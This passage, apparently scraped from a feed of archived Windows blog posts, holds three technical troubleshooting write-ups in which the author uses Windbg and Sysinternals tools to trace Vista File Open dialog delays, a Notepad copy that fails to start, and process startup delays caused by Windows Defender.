face="Calibri" size="3"> ). The conference was a huge success and Windows Vista, which I had taken on the road for the first time, performed great. However, as I was running through some demos before one of my sessions, I noticed that the file open dialog, which is common to all Windows applications, would often take between 5 and 15 seconds to appear. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I didn’t have time to investigate before my talk, so the delays caused me consternation when they showed up during my Windows Vista Kernel Changes session immediately afterward. The behavior felt uncannily like the one I wrote up a few blog posts ago in <A class="" href="#" mce_href="#" target="_blank"> The Case of the Process Startup Delays </A> . In that case, Windows Defender’s Remote Procedure Call (RPC) communications during process startup tried to contact a domain controller, which resulted in hangs when the system was disconnected from its domain. I mumbled excuses on behalf of Windows Vista and tried to distract the audience by explaining the subsequent demonstrations. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> It wasn’t until the plane ride home that I got a chance to look into it. I followed steps similar to the ones I had when I explored the Windows Defender hangs. I launched Notepad from within <A class="" href="#" mce_href="#" target="_blank"> Debugging Tools for Windows </A> ’ Windbg tool, typed Ctrl+O to open the File Open dialog, and when I got the hang broke in and looked at the stack of Notepad’s main thread: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532468/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120949i205AA41B367810C1" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> If you haven’t seen a stack before, it’s a history from most recent to least of nested functions called by a thread. You read it from bottom to top, so the stack shows that Notepad had loaded Browseui.Dll and called its CAddressBand::SetNavigationState function. That function called CBreadcrumbBar::SetNavigationState, which called CBreadcrumbBar::SetIDList, and so on. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A look at the function names on the stack immediately told me what was happening: when you access the Open dialog the first time within an application it navigates to your documents folder. On Windows Vista my folder is C:\Users\Markruss\Documents, but the shell wants to make the path in the dialog’s new “bread crumb” bar pretty by displaying it as “Mark Russinovich\Documents”, and so it calls <A class="" href="#" mce_href="#" target="_blank"> GetUserNameEx </A> to lookup my account’s display named as it’s stored in my User object in Active Directory. I confirmed my theory by verifying that the first parameter SHGetUserDisplayName passes to GetUserNameEx, which is interpreted as the <A class="" href="#" mce_href="#" target="_blank"> EXTENDED_NAME_FORMAT </A> enumeration, is 3: NameDisplay. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I set a breakpoint on the call’s return and hit it after the delay completed. GetUserNameEx returned the ERROR_NO_SUCH_DOMAIN error code, and stepping through SHGetUserDisplayName revealed that it falls back to calling <A class="" href="#" mce_href="#" target="_blank"> GetUserName </A> . Instead of looking up the user’s display name, that function just obtains the Security Identifier (SID) of the user from the process token (the kernel data structure that defined the owner of a process) and calls LookupAccountName to translate the SID to its account name, which in my case is simply “markruss”. Thus, the dialog that appeared looked like this: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532469/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120950i782B811E035F2FA6" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As opposed to this, which is what I saw when I got back to the office and connected to the corporate network: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532470/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120951iA221F03BC51F514D" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I had solved the case, but was curious to know where exactly the delay was taking place and so continued by researching what was happening on the other end of the Secure32!CallSPM call that’s on top of the stack listing. I knew that the Local Security Authority (LSASS) process is responsible for authentication, including interactions with domain controllers and account name translations, so I attached Windbg to the Lsass.exe process (make sure that you detach the debugger from LSASS before exiting with the “qd” command, otherwise LSASS will terminate and the system will begin a 30-second shutdown). I figured that Secur32.Dll acts like both a client and server and confirmed that it was loaded into LSASS, but I needed to determined the server-side function that corresponds to Secur32!SecpGetUserName. I did so by brute force: I dumped the functions implemented by Secur32.Dll and looked for ones with “name” in them: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532471/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120952iACFB35EE4A6F2A01" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I set breakpoints on several of them and when I reproduced the delay I hit the one on SecpGetUserName and stepped through it to eventually get to this stack: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532472/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120953i980BA465BB954ED5" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The <A class="" href="#" mce_href="#" target="_blank"> DsGetDcName </A> function is documented as returning the name of a domain controller in the specified domain. SecpTranslateName obviously need to find a domain controller to which to send the account display name query. I traced further, and discovered that LSASS caches the result of the lookup for 45 seconds, which explained why I didn’t see the delay if I ran a different application and accessed the File Open dialog immediately after getting a delay. Then I hit a temporary dead-end when Netapi32!DsrGetDcNameEx2 executed a RPC request. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Again, figuring that Netapi32 acts like a client and a server, I dumped its symbols and set breakpoints on functions containing “dc”. I let LSASS continue executing and to my surprise hit the exact same function, Netapi32!DsrGetDcNameEx2. I traced into the call deeper and deeper until the thread finally called into the kernel (Ntdll!KiFastSystemCallRet): </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532473/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120954iD7084ABBAE4656CB" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I was close to the end of my investigation. The last question I had was what device driver was Netlogon calling to send a browser datagram? I answered this by looking at the first parameter it passed to NlBrowserDeviceIoControl, which I guessed was a handle to a file object. Then I opened Windbg in Local Kernel Debugging mode (note that on Windows Vista you have to boot in debugging mode to do this), which lets you look at live kernel data structures, and dumped the handle’s information. That showed me the device object that was opened, which told me that the driver is Bowser.sys, the “NT Lan Manager Datagram Receiver Driver”: </FONT> </P> <IMG original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/532474/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120955iBBF3FB3AF46C1018" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <FONT face="Calibri" size="3"> I thought my investigation was complete, but when I later tried to reproduce the delays I failed. I retraced my footsteps and found that LsapGetUserNameForLogonSession caches the display name for 30 minutes. Further, an account’s display name is cached with cached credentials so you won’t experience the delays for the first 30 minutes after logging in or disconnecting from the corporate network. <SPAN style="mso-spacerun: yes"> </SPAN> I confirmed that by waiting 30 minutes and reproducing the hangs. </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> My investigation had come to a close. I had determined that Windows Vista’s File Open dialog tries to look up a user’s display name for the “bread crumb” bar when showing the documents folder and in the process tries to locate a domain controller by sending a Lan Manager datagram via the Bowser.sys device driver. I also knew that there’s no workaround for the delayed dialogs and that anyone that has a domain joined system that’s not connected to their domain will experience the same delays - at least until Windows Vista Service Pack 1. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:30:43 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-delayed-windows-vista-file-open-dialogs/ba-p/723543 MarkRussinovich 2019-06-27T06:30:43Z The Case of the Notepad that Wouldn't Run https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-notepad-that-wouldn-t-run/ba-p/723535 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Oct 01, 2006 </STRONG> <BR /> <P> <A href="#" mce_href="#" target="_blank"> Dave Solomon </A> was on campus a couple of weeks ago presenting a Windows internals seminar to Microsoft developers. Before I joined Microsoft I taught the classes here at Microsoft with him, but now with my other responsibilities here I step into the class and guest present a module or two if my schedule permits. This time I presented the security module, which describes logon (authentication) and the access check (authorization) model. It also includes a separate section on Vista’s User Account Control (UAC) feature, which consists of several technologies including virtualization and a new Mandatory Integrity Control (MIC) security model that’s layered on top of the existing Discretionary Access Control model that Windows NT introduced in its first release. <BR /> </P> <P> UAC allows for users, even administrators, to run as standard users most of the time, while giving them the ability to run executables with administrator rights when necessary. There are several mechanisms by which executables can trigger a request for administrator rights: <BR /> </P> <OL> <BR /> <LI> If the executable image includes a Vista manifest file that specifies a desire or need for administrator rights (this would be added by the developer who creates the image). <BR /> </LI> <LI> If the executable is in Vista’s application compatibility database as a legacy application that Microsoft has identified as requiring administrator rights to run correctly. <BR /> </LI> <LI> If the user explicitly requests an elevation using Explorer’s “Run as administrator” menu item in the context menu for executables (also can be set as an advanced shortcut property). Note that this does not run the executable under the Administrator account, but rather under the account of the logged in user, but with the Administrator group enabled in the process security token. <BR /> </LI> <LI> If the executable is determined to be a setup or installer program (for example, if the word “setup” or “update” is in the image’s name). </LI> </OL> <BR /> <P> Perhaps the most common need for administrator rights comes from setup programs, which generally can’t install properly without write access to HKLM\Software and \Program Files, two locations that only administrators can modify. As an ad-hoc demonstration of the last request method, during the presentation I copied \Windows\Notepad.exe to my account’s profile directory, renaming it to Notepad-setup.exe in the process. Then I launched it, expecting to see a Consent dialog like the one below ask me to grant the renamed Notepad administrative rights: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460301/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460301/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120941i4B8CF8FA87CFBB05" /> <BR /> </P> <P> To my consternation, no such dialog appeared. In fact, nothing happened. I reran it and got the same result. I was thoroughly confused, but didn’t have time to investigate in front of the class, so I moved on. <BR /> </P> <P> When I later got a chance to investigate what had happened, I started Notepad-setup.exe using Windbg (part of the free <A href="#" mce_href="#" target="_blank"> Debugging Tools for Windows </A> ) by clicking “File-&gt;Open Executable” followed by “Debug-&gt;Go” (or you can press F5). I then stepped through the initial instructions of Notepad’s entry point, Winmain. I saw it call an initialization function named NPInit that invokes LoadAccelerators to load Notepad’s keyboard accelerators. Strangely, LoadAccelerators was failing, causing NPInit to return an error to Winmain and Notepad to silently exit. But why would Notepad fail to load its accelerators, which should be included in the Notepad image itself? <BR /> </P> <P> My next step was to see if the file’s name was somehow causing the different behavior so I tried running a copy of Notepad.exe with the original name from my user directory, but got the same behavior (or lack thereof). It was time to watch what was happening with <A href="#" mce_href="#" target="_blank"> Filemon </A> . <BR /> </P> <P> This scenario called for logging the operation of Notepad’s successful execution and comparing that to the log of the failing execution. I started Filemon, set the Include filter to Notepad.exe and the Exclude filter to list the processes that reference Notepad’s image when Notepad launches, including Svchost (where the prefetcher runs) and Explorer (which I was using to launch Notepad): <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460302/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460302/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120942i3456BE82D6AE8476" /> <BR /> </P> <P> I collected both traces, but before I could compare them I had to remove the columns that are always different in different execution traces: Sequence, Timestamp, and Process. To do this I loaded the traces into Excel, selected the data in the first three columns, deleted it, and saved the traces back out as tab-demitted text. You can get the two trace files <A href="#" mce_href="#" target="_blank"> here </A> . <BR /> </P> <P> There are a number of text comparison tools available, but one that’s both free and that serves the needs of this type of comparison is Microsoft’s <A href="#" mce_href="#" target="_blank"> Windiff </A> . Simply open both files and red and yellow lines highlight differences. <BR /> </P> <P> The first few lines that Windiff flags are Notepad reading its prefetch file, which has a different name in each trace because the name encodes the full path of the Notepad image it is associated with in a hash number: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460294/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460294/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120943i4D9B746A55CC8572" /> <BR /> </P> <P> The next set of differences are operations present only in the successful run of Notepad, and appear to be queries of some kind of global Windows resource cache that’s new to Windows Vista: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460295/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460295/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120944i193DF21030B6665A" /> <BR /> </P> <P> It wasn't clear to me why one run references the cache and the other doesn’t, so I continued to scan through the differences. The next&nbsp;group of differences&nbsp;are at lines 47-51 and are simply due to the different paths of the two Notepad copies: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460296/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460296/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120945iF3684CC8B43C5838" /> <BR /> </P> <P> Finally, at line 121 I came across something that looked like it might be the source of the problem: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460297/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460297/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120946iFC5AEE1EC6616043" /> <BR /> </P> <P> The execution of \Windows\Notepad.exe successfully reads a file named Notepad.exe.mui from the \Windows\En-us subdirectory. Further, at line 172 in the trace comparison the failed launch of Notepad tries to read a file of the same name from an En-us subdirectory, but fails because the subdirectory doesn’t exist: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460299/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460299/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120947i4C31CDA047789710" /> <BR /> </P> <P> I knew that .mui files store language-dependent resources like strings and accelerators, so I was pretty certain that Notepad’s failure to load its accelerators was due to its inability to find the appropriate resource file for my local, US English (En-us). To verify this I made an En-us subdirectory in my profile directory and copied Notepad.exe.mui into it, reran Notepad from my directory, and it worked. <BR /> </P> <P> Previous versions of Windows used .mui files to separate language-specific data from executables, but didn’t know that in Windows Vista this capability is exposed for applications to use. The nice thing about the .mui support is that resource-related functions like LoadAccelerators and FindResourceEx do the magic of the language-specific resource files so application developers don’t need to do anything special coding to take advantage of it. <BR /> </P> <P> Now that I had Notepad working outside of the Windows directory I turned my attention to why I hadn’t been presented with a UAC Consent dialog asking me to give it permission to run with administrator rights. What I discovered empirically and then confirmed later in the <A href="#" mce_href="#" target="_blank"> Understanding and Configuring User Account Control in Windows Vista </A> article on Microsoft.com, is that heuristic setup detection only applies to files that don’t have an embedded manifest that specifies a security TrustLevel. Notepad, like all the Windows executables in Windows Vista, does include a manifest. You can see it when you do a dump of Notepad’s strings with the Sysinternals <A href="#" mce_href="#" target="_blank"> Strings </A> utility: <BR /> </P> <P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460300/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/460300/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120948iD19998671E6BDB70" /> <BR /> </P> <P> So, thanks to Filemon, the case of the Notepad that wouldn’t run was closed! </P> </BODY></HTML> Thu, 27 Jun 2019 06:29:52 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-notepad-that-wouldn-t-run/ba-p/723535 MarkRussinovich 2019-06-27T06:29:52Z The Case of the Process Startup Delays https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-process-startup-delays/ba-p/723526 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Aug 31, 2006 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I’ve been extremely busy here at Microsoft and so haven’t had time to blog until now, but plan on getting back to posting regularly. Before I start with a look at a technical problem I ran into recently, I’m pleased to report that the Sysinternals integration is proceeding smoothly and that Bryce and I will unveil an exciting new tool when the site moves to its new home under Microsoft TechNet in late October. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I don’t use my laptop much when I’m not traveling, but I occasionally read email on it in the living room. Like most Windows users, I’m frustrated by occasional unexplained delays when I perform routine tasks like start a program or open a web page. Since joining my laptop to an internal Microsoft domain, I began experiencing regular delays when starting processes. With my Sysinternals tools arsenal in hand, I set out to investigate the root cause, suspecting that recently joining the laptop to the Microsoft domain played a role. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I began my research by first noticing that, after a delay of a few seconds starting a new process, processes I started within the following 30 seconds launched instantly. I therefore started <A href="#" target="_blank"> Process Explorer </A> , waited for 30 seconds, and then executed Notepad from Explorer’s Run dialog. Notepad didn’t appear in Process Explorer’s process tree during the expected delay, which implied the Explorer thread starting Notepad was experiencing the pause, not Notepad’s startup. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> A look at the stack of the launching Explorer thread might give me a hint about the cause, but I was too impatient to look at each of Explorer’s over a dozen threads and so attached the Windbg debugger from the <A href="#" target="_blank"> Microsoft Debugging Tools for Windows </A> to Process Explorer, launched Notepad with Process Explorer’s Run dialog, and broke into the debugger. I opened the thread list in Windbg by selecting Processes and Threads from the View menu, selected the first one displayed, and then revisited the View menu to open the Call Stack dialog: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Stacks display with the most recently called function at the top, so the ZwWaitForSingleObject frame at the top meant that the thread was waiting on some object to become signaled. The stack frames further up the stack are in the RPCRT4 (Remote Procedure Call Runtime Version 4) DLL and the reference to the OpenLpcPort function told me that the thread was trying to initiate a RPC with another process on the same system. <SPAN style="mso-spacerun: yes"> </SPAN> It looked like the wait might be due to the GetMachineAccountSid call highlighted in the screenshot. Just as for domain user accounts, computers belonging to a domain have accounts and GetMachineAccountSid’s name implies that the function returns the Security Identifier (SID) of the computer’s domain account. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I set a breakpoint on the return from the call to GetMachineAccountSid in the OpenLpcPort function and after a short pause consistent with the startup delays, the debugger’s command prompt activated. The x86 calling convention is for function return values to be passed in the EAX register so I examined its value: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> After translating the value to decimal with the “?” command I searched for 1789 in the global error definitions file, WinError.h, of the Platform SDK: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I scoured MSDN documentation and the Web and found essentially no information on the underlying cause for that error code. However, the term “trusted relationship failure” implies that the domain the computer is connecting to doesn’t trust the domain of the computer. But under the circumstances the error didn’t make sense, because I was disconnected from the network and even if the computer was trying to connect a domain, the only one it would connect is the one it belonged to. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> On a hunch, though, I opened a command prompt and ran <A href="#" target="_blank"> PsGetSid </A> to see what error it would get when trying to look up the computer’s domain SID (a computer’s domain account name is the computer name with a “$” appended to it): </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Sure enough, it experienced the same delay, which must be a network timeout, and got the same error. Then I used remote access to connect to the domain and ran the command again: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Further, after connecting to the domain I no longer experienced the startup delays. I disconnected, but continued to have delay-free process launches, even after 30 seconds. After rebooting and not connecting, though, the delays reoccurred. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> At that point I decided to investigate the internals of GetMachineAccountSid. The stack trace showed that it calls into the Netlogon DLL, which performs its own RPC to a function called NetrLogonGetTrustRid. I knew that the Netlogon service runs inside of the Local Security Authority Subsystem (LSASS): </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I attached Windbg to LSASS and set a breakpoint on NetrLogonGetTrustRid. After launching a new process I hit the breakpoint and saw that if a particular field in a data structure is NULL, Netlogon tries to connect to a domain controller, but if the connection fails for any reason, it blindly returns error 1789. However, when I connected to the domain the call succeeded and the value in the data structure filled in with the SID of the computer account, which persists even after a disconnect. That explained the change in behavior after I connected to the domain. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Turning my attention back to GetMachineAccountSid, I found that it caches the results of an error for 30 seconds before asking NetLogon to attempt to connect to a domain controller again. That explained the 30 second quick-start periods. A look through the code flow in the debugger also revealed that OpenLpcPort queries the computer SID as part of a check to see if it matches the SID passed as one of its parameters. If so, OpenLpcPort changes the SID to the SID of the Local System account before calling NtSecureConnectPort, mapping the domain SID to a local one. NtSecureConnectPort takes a SID as a parameter and will only connect to the specified Local Procedure Call (LPC) port if the port was created by the account that matches the SID. </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I’d answered a number of questions, but the big one remained: why was an RPC happening during a process launch at all? The initial stack trace only went up as far as the NegotiateTransferSyntax frame, but there were obviously other frames that the symbol engine couldn’t determine. The stack display went further when I had hit the breakpoint I set in OpenLpcPort, though: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Near the bottom you can see the call to ShellExecCmdLine that the CRunDlg class, which is responsible for the Run dialog implementation, calls. That eventually results in what looks like the execution of shell execute hook extensions, and the one that makes the RPC call is implemented by the MpShHook DLL. I didn’t know off hand what that DLL was, but Process Explorer’s DLL view showed that it’s part of Windows Defender: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> I suspected that the hook is part of Windows Defender’s real-time protection, which the Windows Defender team confirmed. <A href="#" target="_blank"> Autoruns </A> reports that Windows Defender registers the shell execute hook: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The mystery was solved! <SPAN style="mso-spacerun: yes"> </SPAN> Putting it all together: </P> <OL> <BR /> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Explorer’s Run dialog calls ShellExecuteCmdLine </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> ShellExecuteCmdLine calls out to shell execute hooks </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Windows Defender’s hook for real-time protection, MpShHook.Dll, calls RPC to communicate with the Windows Defender service, passing the SID of the service as an argument </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The RPC library calls GetMachineAccountSid to see if the SID matches the computer’s domain SID, in which case it would map the SID to the local system account SID </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> GetMachineAccountSid performs an RPC to the Netlogon service to get the computer account’s SID </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> If the computer account’s SID hasn’t been obtained already, Netlogon tries to connect to a domain controller </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> If the domain controller connection fails after a timeout (the delay), Netlogon returns a trust-relationship failure error </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> The Windows Defender RPC proceeds using the unmapped SID </DIV> <BR /> </LI> <LI> <BR /> <DIV class="MsoNormal" style="MARGIN: 0in 0in 0pt"> Windows Defender’s service performs real-time checks and then process launches </DIV> </LI> </OL> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <A href="#" target="_blank"> </A></P><P> <BR /> </P> <P></P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> A little more research led me to conclude that the delay only happens under very specific circumstances where: </P> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> </P> <UL style="MARGIN-TOP: 0in" type="disc"> <BR /> <LI class="MsoNormal" style="MARGIN: 0in 0in 0pt; mso-list: l0 level1 lfo1; tab-stops: list .5in"> The system is running Windows XP 64-bit for x64 or Windows Server 2003 SP1 <BR /> </LI> <LI class="MsoNormal" style="MARGIN: 0in 0in 0pt; mso-list: l0 level1 lfo1; tab-stops: list .5in"> Windows Defender Beta 2 is active <BR /> </LI> <LI class="MsoNormal" style="MARGIN: 0in 0in 0pt; mso-list: l0 level1 lfo1; tab-stops: list .5in"> The system is domain joined, but has not connected to the domain in the current boot session </LI> </UL> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> 32-bit Windows XP doesn’t perform the SID mapping in OpenLpcPort and Windows Defender doesn’t use a shell execute hook on Windows Vista. The Windows Defender team is looking at workarounds for the next release, but now that I understand the delay I can work around it. </P> <BR /> </BODY></HTML> Thu, 27 Jun 2019 06:28:53 GMT 